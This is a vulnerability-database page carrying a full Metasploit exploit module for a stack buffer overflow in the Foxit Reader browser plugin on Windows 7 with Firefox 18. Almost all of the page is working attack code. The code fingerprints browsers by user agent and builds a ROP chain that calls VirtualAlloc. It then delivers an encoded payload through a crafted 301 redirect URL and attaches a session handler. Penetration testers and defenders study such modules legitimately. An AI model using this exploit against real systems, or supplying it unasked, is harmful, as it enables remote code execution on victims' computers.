Vulners
Lucene search
Foxit Reader Plugin URL Processing Buffer Overflow
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
Rank = NormalRanking
def initialize(info={})
super(update_info(info,
'Name' => "Foxit Reader Plugin URL Processing Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability in the Foxit Reader Plugin, it exists in
the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,
overly long query strings within URLs can cause a stack-based buffer overflow,
which can be exploited to execute arbitrary code. This exploit has been tested
on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281
(npFoxitReaderPlugin.dll version 2.2.1.530).
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # initial discovery and poc
'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module
'juan vazquez', # metasploit module
],
'References' =>
[
[ 'OSVDB', '89030' ],
[ 'BID', '57174' ],
[ 'EDB', '23944' ],
[ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ],
[ 'URL', 'http://secunia.com/advisories/51733/' ]
],
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true
},
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
# npFoxitReaderPlugin.dll version 2.2.1.530
[ 'Automatic', {} ],
[ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281',
{
'Offset' => 272,
'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin
'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin
:rop => :win7_rop_chain
}
]
],
'Privileged' => false,
'DisclosureDate' => "Jan 7 2013",
'DefaultTarget' => 0))
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
#Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || ''
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
end
if os_name == 'Windows 7' and firefox =~ /18/
return targets[1]
end
return nil
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def nops
make_nops(4).unpack("N*")
end
# Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)
def win7_rop_chain
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]
0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]
0x41414141, # Filler (RETN offset compensation)
0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll]
0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]
0x00001000, # 0x00001000-> edx
0x1000d9ec, # XOR EDX, EDX # RETN
0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
junk,
0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]
junk,
junk,
junk,
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]
0x00000001, # 0x00000001-> ebx
0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]
0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]
0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]
nops,
0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]
].flatten.pack("V*")
return rop_gadgets
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
unless self.respond_to?(my_target[:rop])
print_error("Invalid target specified: no callback function defined")
send_not_found(cli)
return
end
return if ((p = regenerate_payload(cli)) == nil)
# we use two responses:
# one for an HTTP 301 redirect and sending the payload
# and one for sending the HTTP 200 OK with appropriate Content-Type
if request.resource =~ /\.pdf$/
# sending Content-Type
resp = create_response(200, "OK")
resp.body = ""
resp['Content-Type'] = 'application/pdf'
resp['Content-Length'] = rand_text_numeric(3,"0")
cli.send_response(resp)
return
else
resp = create_response(301, "Moved Permanently")
resp.body = ""
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
if datastore['SSL']
schema = "https"
else
schema = "http"
end
sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)
sploit << [my_target.ret].pack("V") # EIP
sploit << [my_target['WritableAddress']].pack("V") # Writable Address
sploit << self.send(my_target[:rop])
sploit << p.encoded
resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
cli.send_response(resp)
# handle the payload
handler(cli)
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1